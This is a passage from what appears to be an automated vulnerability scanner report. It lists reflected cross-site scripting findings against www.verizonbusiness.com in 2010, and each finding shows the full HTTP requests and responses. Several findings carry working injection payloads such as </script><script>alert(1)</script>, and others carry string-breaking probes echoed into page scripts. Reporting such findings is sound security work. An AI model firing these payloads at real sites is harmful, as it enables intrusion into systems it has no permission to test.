hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/resourcescb4e7";535fc5b796a/1002a2a8-111-Managed+Networks.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM
...[SNIP]...

1.690. http://www.verizonbusiness.com/resources/1002a2a8-111-Managed+Networks.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a8-111-Managed+Networks.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 74f27'%3b247bcd4fe92 was submitted in the REST URL parameter 1. This input was echoed as 74f27';247bcd4fe92 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources74f27'%3b247bcd4fe92/1002a2a8-111-Managed+Networks.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:24:13 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 40666
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:24:13 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:24:13 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/resources74f27';247bcd4fe92/1002a2a8-111-Managed+Networks.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.691. http://www.verizonbusiness.com/resources/1002a2a8-111-Managed+Networks.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a8-111-Managed+Networks.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ce3d0'%3be0996009779 was submitted in the REST URL parameter 2. This input was echoed as ce3d0';e0996009779 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/ce3d0'%3be0996009779 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:26:10 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40210
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:26:10 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:26:10 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/resources/ce3d0';e0996009779'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.692. http://www.verizonbusiness.com/resources/1002a2a8-111-Managed+Networks.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a8-111-Managed+Networks.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bcde1</script><script>alert(1)</script>744f27ee1b4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/1002a2a8-111-Managed+Networks.xmlbcde1</script><script>alert(1)</script>744f27ee1b4 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 200 OK
Server: Roxen/4.5.146-release3
ETag: "ddae6621b7c523a3119cd04747c05788"
Last-Modified: Wed, 17 Nov 2010 00:26:09 GMT
Content-Type: text/html; charset=ISO-8859-1
Vary: User-Agent
Date: Wed, 17 Nov 2010 00:26:09 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: BERT=VRID%3dd9b02a9e-045e-416a-af05-709f29762b2b|VTID%3d224caeb0-107c-4229-9472-4add7dd6a23a|SX%3d1289954768|VP%3d1|RMC%3dxg|LP%3den; expires=Tue, 17 Nov 2015 05:29:52 GMT; domain=www.verizonbusiness.com; path=/
Expires: Mon, 16 Nov 2009 18:26:09 GMT
Content-Length: 50625

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
<url>/resources/1002a2a8-111-Managed+Networks.xmlbcde1</script><script>alert(1)</script>744f27ee1b4</url>
...[SNIP]...

1.693. http://www.verizonbusiness.com/resources/1002a2a9-111-Premises+Equipment.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a9-111-Premises+Equipment.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8c833'%3b1bc556e0e8d was submitted in the REST URL parameter 1. This input was echoed as 8c833';1bc556e0e8d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources8c833'%3b1bc556e0e8d/1002a2a9-111-Premises+Equipment.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:23:47 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40670
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:23:47 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:23:47 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/resources8c833';1bc556e0e8d/1002a2a9-111-Premises+Equipment.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.694. http://www.verizonbusiness.com/resources/1002a2a9-111-Premises+Equipment.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a9-111-Premises+Equipment.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b1664"%3beb7c94892a2 was submitted in the REST URL parameter 1. This input was echoed as b1664";eb7c94892a2 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resourcesb1664"%3beb7c94892a2/1002a2a9-111-Premises+Equipment.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:23:41 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Content-Type: text/html
Content-Length: 40670
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:23:41 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:23:41 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css" type="text/css"><link med
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/resourcesb1664";eb7c94892a2/1002a2a9-111-Premises+Equipment.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIM
...[SNIP]...

1.695. http://www.verizonbusiness.com/resources/1002a2a9-111-Premises+Equipment.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a9-111-Premises+Equipment.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5f4a1</script><script>alert(1)</script>0add4c62c95 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/1002a2a9-111-Premises+Equipment.xml5f4a1</script><script>alert(1)</script>0add4c62c95 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 200 OK
Server: Roxen/4.5.146-release3
ETag: "060564b760eef90119bbfa831c564589"
Last-Modified: Wed, 17 Nov 2010 00:26:19 GMT
Content-Type: text/html; charset=ISO-8859-1
Vary: User-Agent
Date: Wed, 17 Nov 2010 00:26:20 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: BERT=VRID%3d1763c98a-6207-4d8a-a2bd-17bf8b1416fe|VTID%3daf3707d3-4235-422e-b37b-1e7fd2c36773|SX%3d1289954779|VP%3d1|RMC%3dxg|LP%3den; expires=Tue, 17 Nov 2015 05:30:03 GMT; domain=www.verizonbusiness.com; path=/
Expires: Mon, 16 Nov 2009 18:26:19 GMT
Content-Length: 32805

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<url>/resources/1002a2a9-111-Premises+Equipment.xml5f4a1</script><script>alert(1)</script>0add4c62c95</url>
...[SNIP]...

1.696. http://www.verizonbusiness.com/resources/1002a2a9-111-Premises+Equipment.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a9-111-Premises+Equipment.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e72da'%3ba38ca64e3cf was submitted in the REST URL parameter 2. This input was echoed as e72da';a38ca64e3cf in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/e72da'%3ba38ca64e3cf HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:26:21 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40210
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:26:21 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:26:21 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/resources/e72da';a38ca64e3cf'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.697. http://www.verizonbusiness.com/resources/1002a3a1-111-Awards+and+Recognition.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a3a1-111-Awards+and+Recognition.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ff23e'%3b1b7d0ac632a was submitted in the REST URL parameter 1. This input was echoed as ff23e';1b7d0ac632a in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resourcesff23e'%3b1b7d0ac632a/1002a3a1-111-Awards+and+Recognition.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:29:09 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40678
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:29:09 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:29:09 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/resourcesff23e';1b7d0ac632a/1002a3a1-111-Awards+and+Recognition.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.698. http://www.verizonbusiness.com/resources/1002a3a1-111-Awards+and+Recognition.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a3a1-111-Awards+and+Recognition.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 65508"%3b00e3f62f07d was submitted in the REST URL parameter 1. This input was echoed as 65508";00e3f62f07d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources65508"%3b00e3f62f07d/1002a3a1-111-Awards+and+Recognition.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:28:51 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40678
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:28:51 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:28:51 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/resources65508";00e3f62f07d/1002a3a1-111-Awards+and+Recognition.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION M
...[SNIP]...

1.699. http://www.verizonbusiness.com/resources/1002a3a1-111-Awards+and+Recognition.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a3a1-111-Awards+and+Recognition.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1f6a0</script><script>alert(1)</script>fd341f9eb10 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/1002a3a1-111-Awards+and+Recognition.xml1f6a0</script><script>alert(1)</script>fd341f9eb10 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 200 OK
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
ETag: "2f4ce0b4ee18d04a543fbc5a9c64d597"
Last-Modified: Wed, 17 Nov 2010 00:30:35 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 67384
Date: Wed, 17 Nov 2010 00:30:35 GMT
Connection: close
Set-Cookie: BERT=VRID%3d9740e137-d4ef-4591-89d7-1831e6f9752c|VTID%3d2298d78c-7dc4-4980-a7ae-7288dfd22240|SX%3d1289955034|VP%3d1|RMC%3dxg|LP%3den; expires=Tue, 17 Nov 2015 05:34:18 GMT; domain=www.verizonbusiness.com; path=/
Expires: Mon, 16 Nov 2009 18:30:35 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
<url>/resources/1002a3a1-111-Awards+and+Recognition.xml1f6a0</script><script>alert(1)</script>fd341f9eb10</url>
...[SNIP]...

1.700. http://www.verizonbusiness.com/resources/1002a3a1-111-Awards+and+Recognition.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a3a1-111-Awards+and+Recognition.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 25ed6'%3b5e24dc073b5 was submitted in the REST URL parameter 2. This input was echoed as 25ed6';5e24dc073b5 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/25ed6'%3b5e24dc073b5 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:30:36 GMT
Content-Type: text/html
Content-Length: 40210
Date: Wed, 17 Nov 2010 00:30:37 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:30:36 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/resources/25ed6';5e24dc073b5'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.701. http://www.verizonbusiness.com/resources/1002a3a10-111-Tools.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a3a10-111-Tools.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6dcf1'%3b6d2160ac3cc was submitted in the REST URL parameter 1. This input was echoed as 6dcf1';6d2160ac3cc in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources6dcf1'%3b6d2160ac3cc/1002a3a10-111-Tools.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:29:09 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 40646
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:29:09 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:29:09 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/resources6dcf1';6d2160ac3cc/1002a3a10-111-Tools.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.702. http://www.verizonbusiness.com/resources/1002a3a10-111-Tools.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a3a10-111-Tools.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8bd5d"%3b90836918c73 was submitted in the REST URL parameter 1. This input was echoed as 8bd5d";90836918c73 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources8bd5d"%3b90836918c73/1002a3a10-111-Tools.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:28:51 GMT
Content-Type: text/html
Content-Length: 40648
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:28:51 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:28:51 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
